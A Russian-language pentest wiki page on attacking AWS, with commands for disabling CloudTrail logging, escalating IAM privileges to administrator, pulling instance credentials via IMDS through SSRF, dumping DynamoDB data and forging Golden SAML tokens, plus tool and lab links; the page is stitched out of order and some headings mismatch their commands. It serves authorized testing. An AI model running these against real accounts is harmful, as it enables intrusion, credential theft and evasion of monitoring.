Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-17T10:52:15Z

Drakylar: /* Augmented AI (Amazon A2I) */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

